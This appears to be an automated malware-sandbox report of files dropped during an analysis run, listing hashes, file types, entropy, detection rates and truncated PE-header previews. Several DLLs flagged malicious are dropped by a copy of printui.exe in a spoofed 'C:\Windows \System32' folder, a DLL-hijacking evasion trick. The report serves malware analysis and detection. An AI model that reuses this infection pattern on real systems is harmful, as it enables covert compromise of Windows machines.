                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14624256
                                                                                                                                                                              Entropy (8bit):7.9999055956810405
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:393216:IZNnGPX9yS3g2vfY4xvaicUK7t8gQQbEvfSqReJTq:IznGPNyF2HnxnbKFQvqGeR
                                                                                                                                                                              MD5:E56812B3C7159AEBC1C64DD4B852DDAA
                                                                                                                                                                              SHA1:6F63556A9B90BBC541E8CDE4E485A997FB7F9431
                                                                                                                                                                              SHA-256:11145DF0F89A03C64DA18B6451F34187EAEE3D1B452ECFC96E1AC9C74EA28695
                                                                                                                                                                              SHA-512:FDB49C70FC99D2F00D56C87ACC3292515843814D3E1B9CF666464BB1C7B3A684A3D4488E8726F50ED99B4434F83902269F9A7064525CC473393E410683FA60ED
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....!g..........."...'.B..."...... ..........E.....................................O....`... ......................................`..^....p..P............0.............................................. *..(....................r...............................text....A.......B..................`..`.data...p....`.......F..............@....rdata....... ......................@..@.pdata.......0......................@..@.xdata.......@......................@..@.bss....0....P...........................edata..^....`......................@..@.idata..P....p......................@....CRT....X............ ..............@....tls................."..............@....reloc...............$..............@..B........................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\xcopy.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64000
                                                                                                                                                                              Entropy (8bit):6.336447440888565
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                                                                                                                                                                              MD5:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                                                                              SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                                                                                                                                                                              SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                                                                                                                                                                              SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                              • Filename: printui.dll, Detection: malicious, Browse
                                                                                                                                                                              • Filename: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: F.7z, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):664064
                                                                                                                                                                              Entropy (8bit):6.600432864562189
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:t8g4fg+kOWS/HkLNsFZVfuqF6ph0lhSMXliSRO0N:tB4oc/eCjVfuth0lhSMXl1RO
                                                                                                                                                                              MD5:49672519E74E8AD135DAE7345BCEFF41
                                                                                                                                                                              SHA1:E7ED11FD5E1433527B49E9A6F599829EFD3F2720
                                                                                                                                                                              SHA-256:41B32CEC90F5AF34F5290B2A6556432948027D8C0C18A6A715AE36D71BEC1A50
                                                                                                                                                                              SHA-512:63D6027989CE97CCF17474CA7CDD0DAA4DE54BFD62F3F622BD9610E847B0B22B37B016168F3C1E3FD6EE019EB13A955494CD51FE291EBEA30B2AFE0729D0840A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.1.i._Si._Si._S.MZR.._S.M[Rz._S.M\Ro._SyH\Rc._SyH[Ry._SyHZR1._S!I^Rk._S.M^Rl._Si.^S.._S"IVRk._S"I.Sh._S"I]Rh._SRichi._S........................PE..d...zW.g.........."....).......................@..........................................`.....................................................P....`...........K...........p..T.......8...............................@............0...............................text............................... ..`.rdata.......0......................@..@.data....3..........................@....pdata...K.......L..................@..@.fptable.....P......................@....rsrc........`......................@..@.reloc..T....p......................@..B........................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4684800
                                                                                                                                                                              Entropy (8bit):6.761708409908653
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                                                                                                                                                                              MD5:158F0E7C4529E3867E07545C6D1174A9
                                                                                                                                                                              SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                                                                                                                                                                              SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                                                                                                                                                                              SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):588800
                                                                                                                                                                              Entropy (8bit):6.3852695857936554
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:1dkYvMQmNkYBasGpIFetxo8u3zTkIXmaKSTQP76NuudqbaRArq:1zvMQmmYB4KQ7nu3zuSTQP76NuudqbaF
                                                                                                                                                                              MD5:18CE47F58B4C1A9CFC1EDF7C8BF49B7C
                                                                                                                                                                              SHA1:E74D08AB06ED8200D7E674D8031D6DF8250DE8CB
                                                                                                                                                                              SHA-256:36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
                                                                                                                                                                              SHA-512:19B2D6968095C4E8F08C66AB73E7EC5E0439712BCB2777266602EF2AD123A779395A3D44BC0C7C9945376998FB2165BC60E6BF682863A55A0CFF40C720594BDD
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............|.X.|.X.|.X...X.|.X...Y.|.X..`X.|.X...Y.|.X...Y.|.X...Y.|.X...Y.|.X.|.Xh|.X...Y.|.X...Y.|.X...Y.|.X..bX.|.X.|.X.|.X...Y.|.XRich.|.X........................PE..d...o..f.........." ...).....`......@........................................0............`..........................................Q..$...4[..T................Z........... ..0... ...T...............................@...............`............................text.............................. ..`.rdata..D...........................@..@.data....1...p...*...d..............@....pdata...Z.......\..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1851113
                                                                                                                                                                              Entropy (8bit):6.295735352298234
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                                                                                                                                                                              MD5:158BC77453D382CF6679CE35DF740CC5
                                                                                                                                                                              SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                                                                                                                                                                              SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                                                                                                                                                                              SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):475769
                                                                                                                                                                              Entropy (8bit):5.442192544327632
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                                                                                                                                                                              MD5:E79E7C9D547DDBEE5C8C1796BD092326
                                                                                                                                                                              SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                                                                                                                                                                              SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                                                                                                                                                                              SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):327168
                                                                                                                                                                              Entropy (8bit):6.055910692008984
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                                                                                                                                                                              MD5:EF060E5C414B7BE5875437FF2FB8EC54
                                                                                                                                                                              SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                                                                                                                                                                              SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                                                                                                                                                                              SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):818176
                                                                                                                                                                              Entropy (8bit):6.269258421632734
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                                                                                                                                                                              MD5:69D0FEE0CC47C3B255C317F08CE8D274
                                                                                                                                                                              SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                                                                                                                                                                              SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                                                                                                                                                                              SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):52736
                                                                                                                                                                              Entropy (8bit):5.840253326728635
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                                                                                                                                                                              MD5:9DC829C2C8962347BC9ADF891C51AC05
                                                                                                                                                                              SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                                                                                                                                                                              SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                                                                                                                                                                              SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1786880
                                                                                                                                                                              Entropy (8bit):6.056894707447503
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                                                                                                                                                                              MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                                                                                                                                                                              SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                                                                                                                                                                              SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                                                                                                                                                                              SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14594560
                                                                                                                                                                              Entropy (8bit):6.555250800472154
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:393216:fPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCoJTQP76NuudqFcXSdEVB3:fITk5ac
                                                                                                                                                                              MD5:E6CC988C6D82AD8B8E53AD97ACEFA7FC
                                                                                                                                                                              SHA1:6F63D81FFD568716938A521E46A5793567393CE6
                                                                                                                                                                              SHA-256:75AE51E6D528B5D1FA2F1DDA164F4A01DB554494E3AE6FAF860D9DD4DA8A0E92
                                                                                                                                                                              SHA-512:32C2C04833955182EF3071A05E20F9ADA482C808F4A9812C4B34D42DC17FB275424412FDC6D64E6D2F05D1186FA8BE2264ABAB2DF37B405434BCD6CE26BE4280
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4K.p*..p*..p*.......*......b*......v*..`...z*..`...~*..`..."*......u*..p*...*..;...q*..;.F.q*..;...q*..Richp*..................PE..d....`.g.........." ...)..................................................... ............`..................................................`..<................4......................8.......................(.......@...............x............................text...P........................... ..`.rdata...l.......n..................@..@.data...\2...p.......T..............@....pdata...4.......6...l..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):131920
                                                                                                                                                                              Entropy (8bit):6.0574531251583865
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                                                                                                              MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                                                                                                              SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                                                                                                              SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                                                                                                              SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):384
                                                                                                                                                                              Entropy (8bit):7.493267490352105
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:a1yzGK019rYhVXAsui2cxoOFO79eNtId8qXjo+4M8Oa14BwBRA20GwG7BRW/780c:qm4BYhVXAst2cx7OxeM5Uww4BN/8NR0o
                                                                                                                                                                              MD5:346D1B5D31462307427CB36EE334C25E
                                                                                                                                                                              SHA1:6BD743D6CE09462B732DBE8ECF5F9A4487503174
                                                                                                                                                                              SHA-256:A1402B003A2AFACB156E2BAC31EBA90F5B81633858285C9127A15C314F044A0B
                                                                                                                                                                              SHA-512:8663B936B47617DF9279ACB464FF340F706129D784EA95AE49FA397FC0023793F24287EBD5AAD1EA2B700D137DD073B508B7B1D4A0998F609A1DC060F5313F0B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.....S.N....A....N...-.p...Hbx.Q...Q.=L.4#V.s...N..)...+c...._.;.j;....+.q....4.S..c.\.X.. .$.ba.t.*..x.-3..M..a..+.A...#.........Pq9..i..ET.B..A..PP...p-...Y,.9"./oc.|\.H&..<{..5..c^..K..#...../..'a.S....[.....hZ.........3....{.].\;a}.n...t...'.=_!.A.....?.=Kq....g.....S....F..N._...>..MZ.|B.kL...?...........J-...~^..Xz:O.v.?.g.A.yU..$..#....DI..l.(;......g.`3.
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2311168
                                                                                                                                                                              Entropy (8bit):6.552556779924142
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:FsVRewXhjIyfX8Hp4lJEdCW1Rt+lvSh0lhSMXldobsewf6oV9h0lhSMXln98GzsI:WVReKrGAEdCW1uPfewfv0GlUDYwT
                                                                                                                                                                              MD5:F3A0A68DA39ADD0D56D930A3E52D9E72
                                                                                                                                                                              SHA1:FD789D32C2C7CAB5EE43DCC9505471A98EAC7E70
                                                                                                                                                                              SHA-256:4B85B41D750888AEE1D9CC19E9F1F96191052184A8A6A5D6EF901519F514B7C8
                                                                                                                                                                              SHA-512:E89451CE69C676449A1F1B25C790DD1BA601F7781FD3A70BF27BB5840C89B262109B7F09859EAF0730422F724C33FF101C8DE2F4F0A5619060AAB9AFE050FCEA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'u.qc.."c.."c.."...#..."...#j.."s..#m.."+..#a.."...#z.."s..#h.."s..#..."...#a.."...#l.."c.."s.."(..#q.."(..#b.."(.9"b.."(..#b.."Richc.."........PE..d....W.g.........." ...)............$'........................................#...........`..........................................P".P...PP".......#.......".0.............#.l..... .8..................... .(...@. .@............................................text...T........................... ..`.rdata.............................@..@.data...l}...p"..J...R".............@....pdata..0.....".......".............@..@.fptable......#......(#.............@....rsrc.........#......*#.............@..@.reloc..l.....#......,#.............@..B........................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):90624
                                                                                                                                                                              Entropy (8bit):6.509332615593886
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:Wc9wKxbEwda1CzUbFfbpVxyRyxpGTlKAbe6IOcIOZyyFz5o9X2153:7uKxbEwUEAhbprCOGTKISZyuVo9GT
                                                                                                                                                                              MD5:F53D1EFEA4855DA42DA07DE49D80BA68
                                                                                                                                                                              SHA1:920349F4BD5A5B8E77195C81E261DFA2177EB1EE
                                                                                                                                                                              SHA-256:7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
                                                                                                                                                                              SHA-512:5D72F64B8E5C42A3C9A7BCBBE8A1598A85402ADE4F312AB9E26869F8B39952A3AA037F2CF7DA89E686C5BC3FCB221FEEAE077B9FFD2EEF98DAC0E307637FE7BD
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
